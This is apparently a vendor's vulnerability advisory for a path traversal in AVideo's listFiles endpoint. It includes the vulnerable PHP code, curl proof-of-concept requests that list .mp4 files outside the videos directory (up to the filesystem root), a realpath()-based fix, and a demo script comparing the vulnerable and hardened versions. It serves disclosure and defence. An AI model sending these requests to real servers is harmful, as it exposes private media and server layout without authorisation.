CVE-2026-33238

CVE-2026-33238 is a medium-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0.

Summary

The listFiles.json.php endpoint accepts a path POST parameter and passes it directly to glob() without restricting the path to an allowed base directory. An authenticated uploader can point the listing at any directory readable by the web server process by supplying an arbitrary absolute path, enumerating .mp4 filenames and their full absolute filesystem paths wherever they exist on the server, including locations outside the web root, such as private or premium media directories. Only filenames are returned; file contents are never read.

Details

The vulnerable code is at objects/listFiles.json.php:8-45:

if (!User::canUpload() || !empty($advancedCustom->doNotShowImportMP4Button)) {
    return false;
}
$global['allowed'] = ['mp4'];
// ...
if (!empty($_POST['path'])) {
    $path = $_POST['path'];
    if (substr($path, -1) !== '/') {
        $path .= "/";
    }
    if (file_exists($path)) {
        $extn = implode(",*.", $global['allowed']);
        $filesStr = "{*." . $extn . ",*." . strtolower($extn) . ",*." . strtoupper($extn) . "}";
        $video_array = glob($path . $filesStr, GLOB_BRACE);
        foreach ($video_array as $key => $value) {
            $filePath = mb_convert_encoding($value, 'UTF-8');
            // ...
            $obj->path = $filePath;  // Full absolute path returned to caller

The $_POST['path'] value is used directly in glob() with no call to realpath() for normalization and no prefix check against a permitted base directory (e.g., $global['systemRootPath'] . 'videos/'). The only gate is file_exists(), which is satisfied by any existing directory. The response includes $obj->path containing the full absolute filesystem path of each matched file.

The extension filter ({*.mp4,*.mp4,*.MP4}) limits results to .mp4 filenames in the requested directory (glob() does not recurse, and nothing is read from the matched files), so credentials or source code are not disclosed, but it does not prevent enumeration of video files stored in access-controlled locations such as:

  • Premium/paid content directories
  • Private or unlisted media stores
  • Backup directories containing .mp4 files
  • Paths revealing sensitive server directory structure

canUpload is a standard low-privilege role granted to any registered uploader; it does not imply administrative trust.

PoC

# Step 1: Authenticate as any user with canUpload permission
# (standard uploader account)

# Step 2: Enumerate MP4 files in the designated videos directory (intended use)
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/www/html/videos/"
# Returns: [{"id":0,"path":"/var/www/html/videos/video1.mp4","name":"video1.mp4"}, ...]

# Step 3: Traverse outside intended directory to private content store
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/private/premium-content/"
# Returns: [{"id":0,"path":"/var/private/premium-content/paywalled-video.mp4","name":"paywalled-video.mp4"}, ...]

# Step 4: Probe any other directory, e.g. the filesystem root
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/"
# Returns the .mp4 files directly inside / that are visible to the web server process.
# glob() is not recursive, so an attacker walks the filesystem one directory per request,
# using the absolute paths already returned to guess or confirm further directories.

Expected behavior: Only files within the designated upload directory should be listable.
Actual behavior: Files from any path readable by the web server process are returned with full absolute paths.

Impact

  • Unauthorized media enumeration: An uploader can discover private, premium, or access-controlled .mp4 files stored outside their permitted directory.
  • Filesystem structure disclosure: Full absolute paths reveal server directory layout, aiding further attacks.
  • Content bypass: In AVideo deployments where premium video files are stored in filesystem directories not protected by application access control, this exposes the filenames and paths needed to directly access them if other path traversal or direct-file-access weaknesses are present.
  • Blast radius: Requires canUpload permission (low privilege), but this is the standard permission for all video uploaders on a multi-user AVideo instance.

Generic description of this weakness class (CWE-22): input manipulates file paths to reach files outside the intended directory, with a typical impact of unauthorized file read or write outside that directory. In this specific instance the reach is narrower: the endpoint only lists .mp4 filenames and their absolute paths; it does not read or write file contents.

CVE-2026-33238 has a CVSS score of 4.3 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (26.0); upgrading removes the vulnerable code path.

Affected versions

wwbn/avideo (<= 25.0)

Security releases

wwbn/avideo → 26.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Restrict the supplied path to an allowed base directory using realpath():

if (!empty($_POST['path'])) {
    $allowedBase = realpath($global['systemRootPath'] . 'videos') . '/';
    $path = realpath($_POST['path']);

    // Reject paths that don't start with the allowed base
    if ($path === false || strpos($path . '/', $allowedBase) !== 0) {
        http_response_code(403);
        echo json_encode(['error' => 'Path not allowed']);
        exit;
    }
    $path .= '/';
    // ... continue with glob
}

realpath() resolves ../ sequences and symbolic links before the prefix check, so a traversal sequence or a symlink inside videos/ that points elsewhere is rejected rather than followed. It returns false for a path that does not exist, and the check above answers that case with the same 403 as an existing path outside the base, so the endpoint does not become an oracle for whether arbitrary directories exist. The trailing slash appended to both sides of the comparison matters: without it, a sibling directory such as videos-private/ would pass a plain prefix check against videos.
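The following script is an added example, not code from the AVideo project or from the advisory. It reproduces the listing logic quoted in the Details section and the realpath()-anchored version from the remediation advice as two functions, then runs both against a constructed directory tree under the system temp directory (a videos/ base standing in for $global['systemRootPath'] . 'videos', a private/ store outside it, a sibling videos-private/ directory, and a symlink inside videos/ that points outside). Every path and filename is constructed for the demonstration.

```php
<?php
// Added example, not AVideo project code. Runs the advisory's glob()-based
// listing and a realpath()-anchored version side by side against a constructed
// directory tree. Run with: php listfiles_demo.php
declare(strict_types=1);

$root    = sys_get_temp_dir() . '/avideo-demo-' . getmypid();
$base    = $root . '/videos';          // stands in for $global['systemRootPath'] . 'videos'
$private = $root . '/private';         // stands in for a store outside the web root
foreach ([$base . '/sub', $private, $root . '/videos-private'] as $d) {
    mkdir($d, 0700, true);
}
touch($base . '/public.mp4');
touch($base . '/sub/nested.MP4');
touch($private . '/paywalled.mp4');
touch($root . '/videos-private/leak.mp4');
symlink($private, $base . '/escape');   // symlink inside the base pointing outside it

// The advisory's logic: the caller-supplied path is used as-is.
// GLOB_BRACE is used by the original code; it is unavailable on musl-based builds.
function listVulnerable(string $path): array
{
    $allowed = ['mp4'];
    if (substr($path, -1) !== '/') {
        $path .= '/';
    }
    if (!file_exists($path)) {
        return [];
    }
    $extn     = implode(',*.', $allowed);
    $filesStr = '{*.' . $extn . ',*.' . strtolower($extn) . ',*.' . strtoupper($extn) . '}';
    // The brace list repeats *.mp4, so glob() can return the same file twice; dedupe for display.
    return array_values(array_unique(glob($path . $filesStr, GLOB_BRACE) ?: []));
}

// Hardened version: canonicalise both sides, then require the base as a prefix.
// Returns null for every rejected input, nonexistent or outside the base alike,
// so the response does not reveal whether an arbitrary path exists.
function listHardened(string $path, string $allowedBaseDir): ?array
{
    $allowedBase = realpath($allowedBaseDir);
    $real        = realpath($path);          // false if the path does not exist
    if ($allowedBase === false || $real === false) {
        return null;
    }
    // Trailing slash on both sides: "videos-private/" must not match "videos/".
    if (strpos($real . '/', $allowedBase . '/') !== 0) {
        return null;
    }
    return listVulnerable($real);            // same glob, now confined to the base
}

$cases = [
    'base itself'           => $base,
    'base with slash'       => $base . '/',
    'dot-dot traversal'     => $base . '/sub/../../private',
    'absolute outside base' => $private,
    'shared-prefix sibling' => $root . '/videos-private',
    'symlink escape'        => $base . '/escape',
    'nonexistent path'      => $root . '/nope',
];
foreach ($cases as $label => $p) {
    $v = listVulnerable($p);
    $h = listHardened($p, $base);
    printf("%-22s vulnerable: %-16s hardened: %s\n", $label,
        $v ? implode(',', array_map('basename', $v)) : '(none)',
        $h === null ? 'REJECTED' : ($h ? implode(',', array_map('basename', $h)) : '(none)'));
}

// Remove the constructed tree (the symlink must be unlinked, not rmdir'ed).
unlink($base . '/escape');
foreach ([$base . '/public.mp4', $base . '/sub/nested.MP4',
          $private . '/paywalled.mp4', $root . '/videos-private/leak.mp4'] as $f) {
    unlink($f);
}
foreach ([$base . '/sub', $base, $private, $root . '/videos-private', $root] as $d) {
    rmdir($d);
}
```

The vulnerable function lists paywalled.mp4 for the dot-dot, absolute, sibling-directory and symlink cases, because file_exists() and glob() both resolve those paths happily; the hardened function reports every one of them as REJECTED and lists public.mp4 only for the two in-base inputs. The symlink case is the one a plain string check on the raw input would miss, which is why the canonicalisation has to happen before the prefix comparison rather than after it.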

Frequently Asked Questions

  1. What is CVE-2026-33238? CVE-2026-33238 is a medium-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0. A caller-supplied path is passed to glob() without being confined to the videos directory, so an authenticated uploader can list .mp4 filenames and their absolute paths from any directory readable by the web server. File contents are not exposed.
  2. How severe is CVE-2026-33238? CVE-2026-33238 has a CVSS score of 4.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33238? wwbn/avideo (composer) versions <= 25.0 are affected.
  4. Is there a fix for CVE-2026-33238? Yes. CVE-2026-33238 is fixed in 26.0. Upgrade to this version or later.
  5. Is CVE-2026-33238 exploitable, and should I be worried? Whether CVE-2026-33238 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33238 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33238? Upgrade wwbn/avideo to 26.0 or later.

Other vulnerabilities in wwbn/avideo

CVE-2026-55173, CVE-2026-33731, CVE-2026-33692, CVE-2026-33684, CVE-2026-54458
